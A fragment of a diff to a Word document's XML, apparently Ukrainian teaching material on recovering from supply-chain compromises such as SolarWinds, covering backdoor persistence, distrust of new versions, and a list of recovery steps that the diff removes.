+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:before="0"/>
@@ -9288,7 +7488,7 @@
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
               </w:rPr>
-              <w:t xml:space="preserve">1) Невизначений часовий горизонт компрометації: ��кщо backdoor існував 9 місяців (SolarWinds) — система могла бути скомпрометована задовго до виявлення. Оновлення не ліквідує persistence, що міг встановити зловмисник.</w:t>
+              <w:t xml:space="preserve">1) Невизначений часовий горизонт компрометації: якщо backdoor існував 9 місяців (SolarWinds) — система могла бути скомпрометована задовго до виявлення. Оновлення не ліквідує persistence, що міг встановити зловмисник.</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -9317,34 +7517,6 @@
                 <w:szCs w:val="22"/>
               </w:rPr>
               <w:t xml:space="preserve">3) Недовіра до нових версій: у supply-chain атаці скомпрометовано сам процес розповсюдження. Нова 'чиста' версія може бути так само зараженою.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="FAFCFF"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="60" w:before="60"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:color w:val="1A1A1A"/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Зрілий план відновлення: (a) Forensic-аналіз системи на предмет persistence; (b) Ротація всіх credentials; (c) Перевірка інших встановлених пакетів; (d) Встановлення з альтернативного довіреного джерела з верифікацією хешу; (e) Перегляд процесу управління залежностями (SBOM); (f) Повідомлення регулятора.</w:t>
             </w:r>
           </w:p>
           <w:p>

</xml_diff>